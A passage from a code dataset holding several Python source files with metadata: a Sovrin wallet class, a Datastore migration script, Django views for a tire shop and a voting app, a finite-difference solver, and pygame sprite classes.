transactions that have been prepared (probably submitted)\n self._prepared = {} # type: Dict[(Identifier, int), Request]\n self.lastKnownSeqs = {} # type: Dict[str, int]\n\n self.replyHandler = {\n ATTRIB: self._attribReply,\n GET_ATTR: self._getAttrReply,\n NYM: self._nymReply,\n GET_NYM: self._getNymReply,\n GET_TXNS: self._getTxnsReply,\n NODE: self._nodeReply,\n POOL_UPGRADE: self._poolUpgradeReply\n }\n\n @property\n def pendingCount(self):\n return len(self._pending)\n\n @staticmethod\n def _isMatchingName(needle, haystack):\n return needle.lower() in haystack.lower()\n\n # TODO: The names getMatchingLinksWithAvailableClaim and\n # getMatchingLinksWithReceivedClaim should be fixed. 
Difference between\n    # `AvailableClaim` and `ReceivedClaim` is that for ReceivedClaim we\n    # have attribute values from issuer.\n\n    # TODO: Few of the below methods have duplicate code, need to refactor it\n    def getMatchingLinksWithAvailableClaim(self, claimName=None):\n        matchingLinkAndAvailableClaim = []\n        for k, li in self._links.items():\n            for cl in li.availableClaims:\n                if not claimName or Wallet._isMatchingName(claimName, cl[0]):\n                    matchingLinkAndAvailableClaim.append((li, cl))\n        return matchingLinkAndAvailableClaim\n\n    def getMatchingLinksWithClaimReq(self, claimReqName, linkName=None):\n        matchingLinkAndClaimReq = []\n        for k, li in self._links.items():\n            for cpr in li.claimProofRequests:\n                if Wallet._isMatchingName(claimReqName, cpr.name):\n                    if linkName is None or Wallet._isMatchingName(linkName,\n                                                                  li.name):\n                        matchingLinkAndClaimReq.append((li, cpr))\n        return matchingLinkAndClaimReq\n\n    def addAttribute(self, attrib: Attribute):\n        \"\"\"\n        Used to create a new attribute on Sovrin\n        :param attrib: attribute to add\n        :return: number of pending txns\n        \"\"\"\n        self._attributes[attrib.key()] = attrib\n        req = attrib.ledgerRequest()\n        if req:\n            self.pendRequest(req, attrib.key())\n        return len(self._pending)\n\n    def addNode(self, node: Node):\n        \"\"\"\n        Used to add a new node on Sovrin\n        :param node: Node\n        :return: number of pending txns\n        \"\"\"\n        self._nodes[node.id] = node\n        req = node.ledgerRequest()\n        if req:\n            self.pendRequest(req, node.id)\n        return len(self._pending)\n\n    def doPoolUpgrade(self, upgrade: Upgrade):\n        \"\"\"\n        Used to send a new code upgrade\n        :param upgrade: upgrade data\n        :return: number of pending txns\n        \"\"\"\n        key = upgrade.key\n        self._upgrades[key] = upgrade\n        req = upgrade.ledgerRequest()\n        if req:\n            self.pendRequest(req, key)\n        return len(self._pending)\n\n    def hasAttribute(self, key: AttributeKey) -> bool:\n        \"\"\"\n        Checks if attribute is present in the wallet\n        @param key: Attribute unique key\n        @return:\n        \"\"\"\n        return bool(self.getAttribute(key))\n\n    def getAttribute(self, key: AttributeKey):\n        return self._attributes.get(key.key())\n\n    def getNode(self, id: Identifier):\n        return self._nodes.get(id)\n\n    def getPoolUpgrade(self, key: str):\n        return self._upgrades.get(key)\n\n    def getAttributesForNym(self, idr: Identifier):\n        return [a for a in self._attributes.values() if a.dest == idr]\n\n    def addLink(self, link: Link):\n        self._links[link.key] = link\n\n    def getLink(self, name, required=False) -> Link:\n        l = self._links.get(name)\n        if not l and required:\n            logger.debug(\"Wallet has links {}\".format(self._links))\n            raise LinkNotFound(name)  # `l` is None in this branch, so report the requested name\n        return l\n\n    def addLastKnownSeqs(self, identifier, seqNo):\n        self.lastKnownSeqs[identifier] = seqNo\n\n    def getLastKnownSeqs(self, identifier):\n        return self.lastKnownSeqs.get(identifier)\n\n    def getPendingTxnRequests(self, *identifiers):\n        if not identifiers:\n            identifiers = self.idsToSigners.keys()\n        else:\n            identifiers = set(identifiers).intersection(\n                set(self.idsToSigners.keys()))\n        requests = []\n        for identifier in identifiers:\n            lastTxn = self.getLastKnownSeqs(identifier)\n            op = {\n                TARGET_NYM: identifier,\n                TXN_TYPE: GET_TXNS,\n            }\n            if lastTxn:\n                op[DATA] = lastTxn\n            requests.append(self.signOp(op, identifier=identifier))\n        return requests\n\n    def pendSyncRequests(self):\n        pendingTxnsReqs = self.getPendingTxnRequests()\n        for req in pendingTxnsReqs:\n            self.pendRequest(req)\n\n    def preparePending(self):\n        new = {}\n        while self._pending:\n            req, key = self._pending.pop()\n            sreq = self.signRequest(req)\n            
new[req.identifier, req.reqId] = sreq, key\n self._prepared.update(new)\n # Return request in the order they were submitted\n return sorted([req for req, _ in new.values()],\n key=operator.attrgetter(\"reqId\"))\n\n def handleIncomingReply(self, observer_name, reqId, frm, result,\n numReplies):\n \"\"\"\n Called by an external entity, like a Client, to notify of incoming\n replies\n :return:\n \"\"\"\n preparedReq = self._prepared.get((result[IDENTIFIER], reqId))\n if not preparedReq:\n raise RuntimeError('no matching prepared value for {},{}'.\n format(result[IDENTIFIER], reqId))\n typ = result.get(TXN_TYPE)\n if typ and typ in self.replyHandler:\n self.replyHandler[typ](result, preparedReq)\n # else:\n # raise NotImplementedError('No handler for {}'.format(typ))\n\n def _attribReply(self, result, preparedReq):\n _, attrKey = preparedReq\n attrib = self.getAttribute(AttributeKey(*attrKey))\n attrib.seqNo = result[F.seqNo.name]\n\n def _getAttrReply(self, result, preparedReq):\n # TODO: Confirm if we need to add the retrieved attribute to the wallet.\n # If yes then change the graph query on node to return the sequence\n # number of the attribute txn too.\n _, attrKey = preparedReq\n attrib = self.getAttribute(AttributeKey(*attrKey))\n if DATA in result:\n attrib.value = result[DATA]\n attrib.seqNo = result[F.seqNo.name]\n else:\n logger.debug(\"No attribute found\")\n\n def _nymReply(self, result, preparedReq):\n target = result[TARGET_NYM]\n idy = self._sponsored.get(target)\n if idy:\n idy.seqNo = result[F.seqNo.name]\n else:\n logger.warn(\"Target {} not found in sponsored\".format(target))\n\n def _nodeReply(self, result, preparedReq):\n _, nodeKey = preparedReq\n node = self.getNode(nodeKey)\n node.seqNo = result[F.seqNo.name]\n\n def _poolUpgradeReply(self, result, preparedReq):\n _, upgKey = preparedReq\n upgrade = self.getPoolUpgrade(upgKey)\n upgrade.seqNo = result[F.seqNo.name]\n\n def _getNymReply(self, result, preparedReq):\n jsonData = result.get(DATA)\n if jsonData:\n data = json.loads(jsonData)\n nym = data.get(TARGET_NYM)\n idy = self.knownIds.get(nym)\n if idy:\n idy.role = data.get(ROLE)\n idy.sponsor = data.get(f.IDENTIFIER.nm)\n idy.last_synced = datetime.datetime.utcnow()\n idy.verkey = data.get(VERKEY)\n # TODO: THE GET_NYM reply should contain the sequence number of\n # the NYM transaction\n\n def _getTxnsReply(self, result, preparedReq):\n # TODO\n pass\n\n def pendRequest(self, req, key=None):\n self._pending.appendleft((req, key))\n\n def getLinkInvitationByTarget(self, target: str) -> Link:\n for k, li in self._links.items():\n if li.remoteIdentifier == target:\n return li\n\n def getLinkInvitation(self, name: str):\n return self._links.get(name)\n\n def getMatchingLinks(self, name: str) -> List[Link]:\n allMatched = []\n for k, v in self._links.items():\n if self._isMatchingName(name, k):\n allMatched.append(v)\n return allMatched\n\n # TODO: sender by default should be `self.defaultId`\n def requestAttribute(self, attrib: Attribute, sender):\n \"\"\"\n Used to get a raw attribute from Sovrin\n :param attrib: attribute to add\n :return: number of pending txns\n \"\"\"\n self._attributes[attrib.key()] = attrib\n req = attrib.getRequest(sender)\n if req:\n return self.prepReq(req, key=attrib.key())\n\n # TODO: sender by default should be `self.defaultId`\n def requestIdentity(self, identity: Identity, sender):\n # Used to get a nym from Sovrin\n self.knownIds[identity.identifier] = identity\n req = identity.getRequest(sender)\n if req:\n return 
self.prepReq(req)\n\n def prepReq(self, req, key=None):\n self.pendRequest(req, key=key)\n return self.preparePending()[0]\n\n # DEPR\n # Why shouldn't we fetch link by nonce\n def getLinkByNonce(self, nonce) -> Optional[Link]:\n for _, li in self._links.items():\n if li.invitationNonce == nonce:\n return li\n\n def getLinkByInternalId(self, internalId) -> Optional[Link]:\n for _, li in self._links.items():\n if li.internalId == internalId:\n return li\n\n def getIdentity(self, idr):\n # TODO, Question: Should it consider self owned identities too or\n # should it just have identities that are retrieved from the DL\n return self.knownIds.get(idr)", "repo_name": "sovrin-foundation/old-sovrin", "sub_path": "sovrin/client/wallet/wallet.py", "file_name": "wallet.py", "file_ext": "py", "file_size_in_byte": 11957, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 53, "dataset": "github-code", "pt": "61", "api": [{"api_name": "plenum.common.log.getlogger", "line_number": 28, "usage_type": "call"}, {"api_name": "plenum.client.wallet.Wallet", "line_number": 32, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.sponsoring.Sponsoring", "line_number": 32, "usage_type": "name"}, {"api_name": "plenum.common.did_method.DidMethods", "line_number": 37, "usage_type": "name"}, {"api_name": "plenum.client.wallet.Wallet.__init__", "line_number": 38, "usage_type": "call"}, {"api_name": "plenum.client.wallet.Wallet", "line_number": 38, "usage_type": "name"}, {"api_name": "sovrin.common.did_method.DefaultDidMethods", "line_number": 40, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.sponsoring.Sponsoring.__init__", "line_number": 41, "usage_type": "call"}, {"api_name": "sovrin.client.wallet.sponsoring.Sponsoring", "line_number": 41, "usage_type": "name"}, {"api_name": "collections.deque", "line_number": 52, "usage_type": "call"}, {"api_name": "sovrin.common.txn.ATTRIB", "line_number": 60, "usage_type": "name"}, {"api_name": "sovrin.common.txn.GET_ATTR", "line_number": 61, "usage_type": "name"}, {"api_name": "plenum.common.txn.NYM", "line_number": 62, "usage_type": "name"}, {"api_name": "sovrin.common.txn.GET_NYM", "line_number": 63, "usage_type": "name"}, {"api_name": "sovrin.common.txn.GET_TXNS", "line_number": 64, "usage_type": "name"}, {"api_name": "plenum.common.txn.NODE", "line_number": 65, "usage_type": "name"}, {"api_name": "sovrin.common.txn.POOL_UPGRADE", "line_number": 66, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.attribute.Attribute", "line_number": 101, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.node.Node", "line_number": 113, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.upgrade.Upgrade", "line_number": 125, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.attribute.AttributeKey", "line_number": 138, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.attribute.AttributeKey", "line_number": 146, "usage_type": "name"}, {"api_name": "plenum.common.types.Identifier", "line_number": 149, "usage_type": "name"}, {"api_name": "plenum.common.types.Identifier", "line_number": 155, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.link.Link", "line_number": 158, "usage_type": "name"}, {"api_name": "sovrin.common.exceptions.LinkNotFound", "line_number": 165, "usage_type": "call"}, {"api_name": "sovrin.client.wallet.link.Link", "line_number": 161, "usage_type": "name"}, {"api_name": "plenum.common.txn.TARGET_NYM", "line_number": 184, "usage_type": "name"}, {"api_name": "plenum.common.txn.TXN_TYPE", 
"line_number": 185, "usage_type": "name"}, {"api_name": "sovrin.common.txn.GET_TXNS", "line_number": 185, "usage_type": "name"}, {"api_name": "plenum.common.txn.DATA", "line_number": 188, "usage_type": "name"}, {"api_name": "operator.attrgetter", "line_number": 206, "usage_type": "call"}, {"api_name": "plenum.common.txn.IDENTIFIER", "line_number": 215, "usage_type": "name"}, {"api_name": "plenum.common.txn.IDENTIFIER", "line_number": 218, "usage_type": "name"}, {"api_name": "plenum.common.txn.TXN_TYPE", "line_number": 219, "usage_type": "argument"}, {"api_name": "sovrin.client.wallet.attribute.AttributeKey", "line_number": 227, "usage_type": "call"}, {"api_name": "ledger.util.F.seqNo", "line_number": 228, "usage_type": "attribute"}, {"api_name": "ledger.util.F", "line_number": 228, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.attribute.AttributeKey", "line_number": 235, "usage_type": "call"}, {"api_name": "plenum.common.txn.DATA", "line_number": 236, "usage_type": "name"}, {"api_name": "plenum.common.txn.DATA", "line_number": 237, "usage_type": "name"}, {"api_name": "ledger.util.F.seqNo", "line_number": 238, "usage_type": "attribute"}, {"api_name": "ledger.util.F", "line_number": 238, "usage_type": "name"}, {"api_name": "plenum.common.txn.TARGET_NYM", "line_number": 243, "usage_type": "name"}, {"api_name": "ledger.util.F.seqNo", "line_number": 246, "usage_type": "attribute"}, {"api_name": "ledger.util.F", "line_number": 246, "usage_type": "name"}, {"api_name": "ledger.util.F.seqNo", "line_number": 253, "usage_type": "attribute"}, {"api_name": "ledger.util.F", "line_number": 253, "usage_type": "name"}, {"api_name": "ledger.util.F.seqNo", "line_number": 258, "usage_type": "attribute"}, {"api_name": "ledger.util.F", "line_number": 258, "usage_type": "name"}, {"api_name": "plenum.common.txn.DATA", "line_number": 261, "usage_type": "argument"}, {"api_name": "json.loads", "line_number": 263, "usage_type": "call"}, {"api_name": "plenum.common.txn.TARGET_NYM", "line_number": 264, "usage_type": "argument"}, {"api_name": "plenum.common.txn.ROLE", "line_number": 267, "usage_type": "argument"}, {"api_name": "plenum.common.types.f.IDENTIFIER", "line_number": 268, "usage_type": "attribute"}, {"api_name": "plenum.common.types.f", "line_number": 268, "usage_type": "name"}, {"api_name": "datetime.datetime.utcnow", "line_number": 269, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 269, "usage_type": "attribute"}, {"api_name": "plenum.common.txn.VERKEY", "line_number": 270, "usage_type": "argument"}, {"api_name": "sovrin.client.wallet.link.Link", "line_number": 281, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 289, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.link.Link", "line_number": 289, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.attribute.Attribute", "line_number": 297, "usage_type": "name"}, {"api_name": "sovrin.common.identity.Identity", "line_number": 309, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 322, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.link.Link", "line_number": 322, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 327, "usage_type": "name"}, {"api_name": "sovrin.client.wallet.link.Link", "line_number": 327, "usage_type": "name"}]} +{"seq_id": "28896253216", "text": "\"\"\"\nMigration script for NEXTAPI-1625. 
Adds linked_at and connected_at fields to Org kind.\n\"\"\"\nimport sys\nfrom google.cloud import datastore\n\n\ndef main(project_id):\n \"\"\"\n Adds linked_at and connected_at fields to Org kind entries which do not have the fields already. It uses the\n created_at value for linked_at and connected_at as that's the best guess we have.\n \"\"\"\n client = datastore.Client(project_id)\n query = client.query(kind='Org')\n\n for org in query.fetch():\n print(\"processing {}\".format(org.key.name))\n save = False\n\n if org.get('linked_at'):\n print(\" linked_at already exists ({})\".format(org['linked_at']))\n else:\n print(\" setting linked_at to {}\".format(org['created_at']))\n org['linked_at'] = org['created_at']\n save = True\n\n if org.get('connected_at'):\n print(\" connected_at already exists ({})\".format(org['connected_at']))\n else:\n print(\" setting connected_at to {}\".format(org['created_at']))\n org['connected_at'] = org['created_at']\n save = True\n\n if save:\n client.put(org)\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print(\"usage: migrate.py PROJECT_ID\")\n print(\" PROJECT_ID example: acuit-gl-sync-dev\")\n exit(1)\n\n main(sys.argv[1])\n", "repo_name": "SoulMen007/acuit-gl-ingester-zuora", "sub_path": "migrations/NEXTAPI-1625/migrate.py", "file_name": "migrate.py", "file_ext": "py", "file_size_in_byte": 1371, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "google.cloud.datastore.Client", "line_number": 13, "usage_type": "call"}, {"api_name": "google.cloud.datastore", "line_number": 13, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 39, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 44, "usage_type": "attribute"}]} +{"seq_id": "38938698535", "text": "import requests\nfrom django.core.paginator import EmptyPage, PageNotAnInteger, Paginator\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom django.contrib import messages\nfrom django.http import HttpResponse\nfrom django.template import loader\nimport datetime\nfrom django.views.generic.list import ListView\nfrom .models import Tire, QuickOrderNewTire\nfrom .forms import QuickOrderNewTireForm\nfrom .filters import TireFilter\n\n# Create your views here.\n\n# class Home(ListView):\n \n# queryset = Tire.objects.all().order_by('-in_stock')\n# paginate_by = 2\n\n# template_name = 'new_tire/new-tire-list.html'\n\n# def get_context_data(self, **kwargs):\n# context = super().get_context_data(**kwargs)\n# context['filter'] = TireFilter(self.request.GET, queryset=self.get_queryset())\n\n \n# return context\n\ndef Home(request):\n f = TireFilter(request.GET, queryset=Tire.objects.all().order_by('-season', '-in_stock'))\n\n paginator = Paginator(f.qs, 33)\n page = request.GET.get('page')\n paged_listings = paginator.get_page(page)\n\n context = {\n 'filter': f,\n 'paginator_filter': paged_listings\n }\n\n if request.method == 'GET':\n print('Get')\n return render(request, 'new_tire/new-tire-list.html', context)\n\n\ndef TireDetail(request, slug):\n\n template = loader.get_template('new_tire/new_tire_detail.html')\n tire = get_object_or_404(Tire, slug=slug)\n\n \n if request.method == 'POST':\n form = QuickOrderNewTireForm(request.POST)\n \n #form.fields['phone'].validators = [MinValueValidator(500000000, message='Не вистачає цифри. Приклад: 0971234455'),\n # MaxValueValidator(999999999, message='Ви вели забагато цифр. 
Приклад: 0971234455')]\n\n if form.is_valid():\n qo = form.save(commit=False)\n try:\n QuickOrderNewTire.objects.get(phone=qo.phone, tire=tire)\n messages.success(request, \"Ваше замовлення отримано менеджером. Чекайте на дзвінок.\")\n except QuickOrderNewTire.DoesNotExist:\n if request.user.username == 'AnonymouseUser':\n \n obj, create = QuickOrderNewTire.objects.update_or_create(phone=qo.phone, tire=tire, price=tire.price_two)\n messages.success(request, \"Дякуємо! Заявка надіслана успішно! Скоро з Вами зв'яжеться наш менеджер.\")\n else:\n \n obj, create = QuickOrderNewTire.objects.update_or_create(phone=qo.phone, tire=tire, price=tire.price_two)\n messages.success(request, \"Дякуємо! Заявка надіслана успішно! Скоро з Вами зв'яжеться наш менеджер.\")\n else:\n form = QuickOrderNewTireForm()\n \n\n context = {\n 'tire': tire,\n 'form': form,\n }\n\n return HttpResponse(template.render(context, request))\n\n\n\ndef OlderRecords(request):\n\n template = loader.get_template('tires/old_tire.html')\n \n today = datetime.datetime.now() - datetime.timedelta(days=1)\n old_records = Tire.objects.filter(updated__lt=today, in_stock__gt=0 )\n counter = old_records.count()\n\n context = {\n 'old_records': old_records,\n 'counter': counter,\n }\n\n return HttpResponse(template.render(context, request))\n\n\ndef UpdatePrice(request):\n if request.user.is_superuser:\n today = datetime.datetime.now() - datetime.timedelta(hours=15)\n old_records = Tire.objects.filter(updated__lt=today, in_stock__gt=0 ).update(in_stock=0)\n else:\n pass\n\n return redirect('/')\n\n", "repo_name": "dikiyvolchara/car", "sub_path": "new_tire/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3826, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "filters.TireFilter", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Tire.objects.all", "line_number": 30, "usage_type": "call"}, {"api_name": "models.Tire.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "models.Tire", "line_number": 30, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 32, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 43, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 48, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 48, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 49, "usage_type": "call"}, {"api_name": "models.Tire", "line_number": 49, "usage_type": "argument"}, {"api_name": "forms.QuickOrderNewTireForm", "line_number": 53, "usage_type": "call"}, {"api_name": "models.QuickOrderNewTire.objects.get", "line_number": 61, "usage_type": "call"}, {"api_name": "models.QuickOrderNewTire.objects", "line_number": 61, "usage_type": "attribute"}, {"api_name": "models.QuickOrderNewTire", "line_number": 61, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 62, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 62, "usage_type": "name"}, {"api_name": "models.QuickOrderNewTire.DoesNotExist", "line_number": 63, "usage_type": "attribute"}, {"api_name": "models.QuickOrderNewTire", "line_number": 63, "usage_type": "name"}, {"api_name": "models.QuickOrderNewTire.objects.update_or_create", "line_number": 66, "usage_type": "call"}, {"api_name": "models.QuickOrderNewTire.objects", "line_number": 66, 
"usage_type": "attribute"}, {"api_name": "models.QuickOrderNewTire", "line_number": 66, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 67, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 67, "usage_type": "name"}, {"api_name": "models.QuickOrderNewTire.objects.update_or_create", "line_number": 70, "usage_type": "call"}, {"api_name": "models.QuickOrderNewTire.objects", "line_number": 70, "usage_type": "attribute"}, {"api_name": "models.QuickOrderNewTire", "line_number": 70, "usage_type": "name"}, {"api_name": "django.contrib.messages.success", "line_number": 71, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 71, "usage_type": "name"}, {"api_name": "forms.QuickOrderNewTireForm", "line_number": 73, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 81, "usage_type": "call"}, {"api_name": "django.template.loader.get_template", "line_number": 87, "usage_type": "call"}, {"api_name": "django.template.loader", "line_number": 87, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 89, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 89, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 89, "usage_type": "call"}, {"api_name": "models.Tire.objects.filter", "line_number": 90, "usage_type": "call"}, {"api_name": "models.Tire.objects", "line_number": 90, "usage_type": "attribute"}, {"api_name": "models.Tire", "line_number": 90, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 98, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 103, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 103, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 103, "usage_type": "call"}, {"api_name": "models.Tire.objects.filter", "line_number": 104, "usage_type": "call"}, {"api_name": "models.Tire.objects", "line_number": 104, "usage_type": "attribute"}, {"api_name": "models.Tire", "line_number": 104, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 108, "usage_type": "call"}]} +{"seq_id": "30952349403", "text": "from django.shortcuts import render_to_response\nfrom thestar.models import Competitor, Vote\nfrom django.http import HttpResponse\n\ndef home(request):\n template = 'home.html'\n\n competitors = Competitor.objects.all()\n data = {'competitors': competitors}\n return render_to_response(template, data)\n\ndef vote(request):\n no = request.GET['no']\n competitor = Competitor.objects.get(no=no)\n vote = Vote()\n vote.competitor = competitor\n vote.save()\n return HttpResponse('OK')\n", "repo_name": "prontoaom/basic_python_django", "sub_path": "day2/my_first_app/thestar/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 497, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "thestar.models.Competitor.objects.all", "line_number": 8, "usage_type": "call"}, {"api_name": "thestar.models.Competitor.objects", "line_number": 8, "usage_type": "attribute"}, {"api_name": "thestar.models.Competitor", "line_number": 8, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 10, "usage_type": "call"}, {"api_name": "thestar.models.Competitor.objects.get", "line_number": 14, "usage_type": "call"}, {"api_name": "thestar.models.Competitor.objects", "line_number": 14, 
"usage_type": "attribute"}, {"api_name": "thestar.models.Competitor", "line_number": 14, "usage_type": "name"}, {"api_name": "thestar.models.Vote", "line_number": 15, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "40836695152", "text": "import autograd.numpy as np\n\ndef fd_central(r, q, p, x, y_a, y_b, method=\"central\"):\n\n if type( x ) != np.ndarray:\n if type( x ) == list:\n x = np.array( x )\n else:\n x = np.array( [ float( x ) ] )\n\n n = len( x )\n\n # Make sure that u, v, and w are either scalars or n-element vectors.\n # If they are scalars then we create vectors with the scalar value in\n # each position.\n\n if type( r ) == int or type( r ) == float:\n r = np.array( [ float( r ) ] * n )\n\n if type( q ) == int or type( q ) == float:\n q = np.array( [ float( q ) ] * n )\n\n if type( p ) == int or type( p ) == float:\n p = np.array( [ float( p ) ] * n )\n\n # Compute the stepsize. It is assumed that all elements in t are\n # equally spaced.\n\n h = x[1] - x[0]\n print(h)\n if method == \"central\":\n ai = (1 + (1/2) * h**2 * q)\n bi = (-1/2) * ((h/2) * p + 1)\n ci = (-1/2) * (1 - (h/2) * p)\n ri = (-1/2) * h**2 * r\n elif method == \"backward\":\n ai = -2/h**2 -p/h - q\n bi = 1/h**2 + p/h\n ci = np.array([1/h**2] * n)\n ri = r\n elif method == \"foward\":\n ai = (-2/h**2) + p/h - q\n bi = np.array([1/h**2] * n)\n ci = (1/h**2) - p/h\n ri = r\n print(bi)\n else:\n pass\n\n ri[1] = ri[1] - (bi[1]*y_a)\n ri[-2] = ri[-2] - (ci[-2]*y_b)\n\n A = np.diag(ai[1:-1]) + np.diag(bi[2:-1], -1) + np.diag(ci[1:-2], 1)\n\n y = np.linalg.solve(A, ri[1:-1])\n y = np.concatenate(([y_a], y, [y_b]))\n return y", "repo_name": "gilmarfrancisco828/fapesp2020", "sub_path": "pos_mac_equacoes/trabalho_pratico_01/fd_central.py", "file_name": "fd_central.py", "file_ext": "py", "file_size_in_byte": 1549, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "autograd.numpy.ndarray", "line_number": 5, "usage_type": "attribute"}, {"api_name": "autograd.numpy", "line_number": 5, "usage_type": "name"}, {"api_name": "autograd.numpy.array", "line_number": 7, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 7, "usage_type": "name"}, {"api_name": "autograd.numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 9, "usage_type": "name"}, {"api_name": "autograd.numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 18, "usage_type": "name"}, {"api_name": "autograd.numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 21, "usage_type": "name"}, {"api_name": "autograd.numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 24, "usage_type": "name"}, {"api_name": "autograd.numpy.array", "line_number": 39, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 39, "usage_type": "name"}, {"api_name": "autograd.numpy.array", "line_number": 43, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 43, "usage_type": "name"}, {"api_name": "autograd.numpy.diag", "line_number": 53, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 53, "usage_type": "name"}, {"api_name": "autograd.numpy.linalg.solve", "line_number": 55, "usage_type": "call"}, {"api_name": "autograd.numpy.linalg", "line_number": 55, "usage_type": "attribute"}, 
{"api_name": "autograd.numpy", "line_number": 55, "usage_type": "name"}, {"api_name": "autograd.numpy.concatenate", "line_number": 56, "usage_type": "call"}, {"api_name": "autograd.numpy", "line_number": 56, "usage_type": "name"}]} +{"seq_id": "43170216352", "text": "import pygame\nimport pyBaba\n\n\nclass MapSprite(pygame.sprite.Sprite):\n def __init__(self, image, x, y, is_icon):\n if is_icon:\n self.image = pygame.image.load('./sprites/icon/{}.gif'.format(image))\n else:\n self.image = pygame.image.load('./sprites/text/{}.gif'.format(image))\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n pygame.sprite.Sprite.__init__(self)\n\n\nclass ResultImage(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n\n def update(self, status, screen_size):\n if status == pyBaba.PlayState.WON:\n self.size = max(screen_size[0], screen_size[1]) // 2\n self.image = pygame.transform.scale(pygame.image.load(\n './sprites/won.png'), (self.size, self.size))\n self.rect = self.image.get_rect()\n self.rect.center = (screen_size[0] // 2, screen_size[1] // 2)\n else:\n self.size = max(screen_size[0], screen_size[1]) // 2\n self.image = pygame.transform.scale(pygame.image.load(\n './sprites/lost.png'), (self.size, self.size))\n self.rect = self.image.get_rect()\n self.rect.center = (screen_size[0] // 2, screen_size[1] // 2)\n", "repo_name": "utilForever/baba-is-auto", "sub_path": "Extensions/BabaGUI/sprites.py", "file_name": "sprites.py", "file_ext": "py", "file_size_in_byte": 1289, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 134, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pygame.sprite", "line_number": 5, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 8, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pyBaba.PlayState", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 25, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 31, "usage_type": 